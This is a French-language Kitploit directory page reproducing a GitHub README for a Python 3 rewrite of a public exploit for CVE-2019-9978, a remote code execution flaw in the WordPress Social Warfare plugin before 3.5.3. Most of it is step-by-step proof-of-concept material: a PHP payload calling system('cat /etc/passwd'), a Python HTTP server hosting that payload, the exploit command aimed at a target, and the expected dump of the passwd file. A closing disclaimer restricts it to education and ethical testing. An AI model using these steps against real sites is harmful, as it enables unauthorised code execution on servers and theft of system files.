Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-9978 — Une vulnérabilité d'exécution de code à distance (RCE) dans le plugin Social Warfare pour WordPress, touchant les versions antérieures à 3.5.3. | Kitploit
Outils/GitHubGitHub/echoosso/cve-2019-9978
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubechoosso/cve-2019-9978

CVE-2019-9978

Une vulnérabilité d'exécution de code à distance (RCE) dans le plugin Social Warfare pour WordPress, touchant les versions antérieures à 3.5.3.

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-9978 - Exécution de code à distance (RCE) dans le plugin WordPress Social Warfare < 3.5.3

Une vulnérabilité d'exécution de code à distance (RCE) dans le plugin Social Warfare pour WordPress, affectant toutes les versions antérieures à 3.5.3.


💡 Motivation

L'exploit public d'origine était écrit dans une version obsolète de Python et ne fonctionne plus correctement dans les environnements modernes.
J'ai réécrit l'exploit pour qu'il soit entièrement compatible avec Python 3, afin de le rendre plus facile à utiliser, à comprendre et à intégrer dans les outils modernes.


Preuve de concept (PoC)

✅ Étape 1 – Créer la charge utile

Créez un fichier nommé payload.txt avec le contenu suivant :

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ Étape 2 – Démarrer un serveur HTTP Python

Utilisez Python pour servir votre charge utile :

root@kitploit:~
python3 -m http.server 8000

Votre payload.txt sera alors accessible à l'adresse :

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ Étape 3 – Exécuter l'exploit

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

Résultat attendu

Si la cible est vulnérable, vous recevrez une sortie similaire à :

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Captures d'écran

Le serveur HTTP reçoit la requête

http-server

Exécution réussie de l'exploit

exploit

Contenu du fichier de charge utile

payload


🧬 Si cette charge utile vous a rendu service, une ⭐ ferait ma journée.

Détails techniques

  • Plugin : Social Warfare
  • Versions affectées : < 3.5.3
  • CVE : CVE-2019-9978
  • Type de vulnérabilité : Exécution de code à distance (RCE)
  • Auteur d'origine : @hash3liZer
  • Chercheur : Luka Sikic

Crédits

  • Auteur de l'exploit : @hash3liZer
  • Réécriture en Python 3 : @echosso

⚠️ Avertissement : Ce dépôt est uniquement destiné à des fins éducatives et de test éthique.
Toute utilisation non autorisée de cet exploit contre des systèmes qui ne vous appartiennent pas est strictement interdite.

Télécharger l’outil